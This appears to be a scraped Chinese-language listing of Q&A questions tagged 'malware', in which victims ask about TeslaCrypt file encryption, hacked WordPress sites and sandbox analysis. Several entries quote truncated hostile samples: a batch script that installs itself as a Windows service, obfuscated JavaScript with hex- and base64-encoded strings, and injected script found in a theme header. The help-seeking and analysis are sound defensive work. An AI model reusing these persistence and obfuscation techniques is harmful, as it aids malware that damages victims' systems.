malware

    0热度

    2回答

    我发现我的员工文档有些奇怪,事实证明包括文档在内的所有文件都使用“.vvv”扩展名加密。到目前为止,我发现它被称为TeslaCrypt,它将所有文件转换为.vvv,甚至将其重命名为正确的扩展名,它表示该文件已被修改,因此我无法再打开文件。请帮助,我们不能工作,直到该文件可以运作。我无法将此标记为“TeslaCrpyt”,因此如果任何人都可以帮我标记它,那就太好了。 内容如何恢复: What hap

    0热度

    2回答

    我有一个简单的wordpress网站,它似乎被黑客入侵。我使用了一些插件来扫描它,他们说我的htaccess文件被感染。现在我可以使用一些帮助清理它 - 具体来说,了解 要寻找什么清理?即htaccess中的“感染”是什么样的? 如何防止将来未经授权访问该文件? 有问题的htaccess是: ​​

    0热度

    2回答

    我必须检查LG G3是否存在具有波动性的恶意软件。 所以我需要一个内存转储。 有没有人知道如何得到它? 感谢您的回答。 问候,费利克斯!

    0热度

    1回答

    当我在杜鹃沙盒中提交文件进行分析时,我总是在“部分”下的报告中看到每个部分都有Entropy列。 我得到像0,7.91863415033,4.44345104565这样的值。 这个熵是什么意思?我试图在Google上搜索关于熵的任何信息,但我没有找到有用的东西。

    1热度

    2回答

    @echo off SET i=0 SET "NomeProcesso=DaMonki.exe" SET "NomeService=DaMonki" rem <=== run as service ===> echo sc create %NomeService% binpath=%0 > service.bat echo sc start %NomeService% >> serv

    -3热度

    1回答

    var a = ['document', 'window', String]; var b = '108 111 99 97 116 105 111 110'; var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d'; var d = 'ZnJvbUNoYXJDb2Rl'; var e = '

    1热度

    1回答

    我是一个Linux的家伙试图了解Windows机器是怎么感染了勒索。受害者获得一个带有zipfile的钓鱼邮件,该zipfile包含一个模糊的javascript,该脚本似乎使用MSXML2.XMLHTTP下载恶意可执行文件,然后以某种方式将控制权转移给WScript.Shell。 我的问题是怎么可能在没有用户看到任何警报或确认框的情况下工作(也许他已经点击了过去)。它只能在Internet Ex

    1热度

    1回答

    我发现下面的代码到主题的header.php文件中,我不确定它们是什么。 <script> var a = ''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.re

    0热度

    1回答

    我在一个网站运行“Sucuri SiteCheck”,即时通讯工作和sitecheck报告下面的代码为恶意软件: 已知的JavaScript恶意软件。 详情: http://labs.sucuri.net/db/malware/mwjs-include-unescape3?v1 代码: var i,y,x="3c646976207374796c653d22706f736974696f6e3a616

    0热度

    1回答

    我在最近建立的Wordpress网站有一个奇怪的问题,其中当用户通过搜索引擎(通常是Google)访问网站页面之一时,会产生一些奇怪的标记页脚元素。该标记是链接到不存在的存档页面的日期的无序列表,以及链接到不存在的分类页面的无序列表。 这里的奇怪之处在于主题中没有代码可以生成这个标记,甚至更奇怪的是,无序列表中的类别不存在于网站的数据库中。我首先想到的是,这可能是可能的恶意软件感染的结果,但由于链